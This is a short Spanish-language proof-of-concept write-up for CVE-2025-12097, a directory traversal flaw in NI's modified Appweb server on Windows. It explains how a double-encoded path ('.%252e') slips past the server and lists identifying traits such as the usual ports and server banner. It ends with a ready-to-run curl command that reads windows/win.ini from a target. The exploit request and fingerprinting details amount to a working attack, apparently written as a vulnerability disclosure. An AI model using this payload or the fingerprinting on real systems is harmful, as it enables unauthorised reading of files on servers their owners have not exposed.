
Exploit de prueba de concepto para CVE-2025-12097, una vulnerabilidad de recorrido de directorios en el servidor Appweb modificado por NI que permite la lectura arbitraria de archivos en sistemas Windows.
La modificación de NI del servidor Appweb contiene una vulnerabilidad de salto de directorio que permite a un atacante leer archivos arbitrarios en el servidor.
La ruta URI /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini se convertirá en:
pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808 que es una URI válida y appweb no bloquea esta solicitud. A continuación, esto se pasa al manejador personalizado que, en este caso, devuelve el contenido de cualquier archivo solicitado.
Debido a la naturaleza del software afectado, los dispositivos afectados son exclusivamente sistemas Microsoft Windows.
Versión vulnerable más alta observada: 12.0.0.
Los dispositivos afectados se pueden identificar por las siguientes características:
No siempre está presente, pero en la mayoría de los casos el servicio se ejecuta en el puerto 3580; otros puertos pueden incluir 8080 y 80.
Respuesta del servidor a /
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126
<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>
Para explotar esta vulnerabilidad, puede usar el siguiente comando:
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
Verá el contenido del archivo win.ini si el objetivo es vulnerable.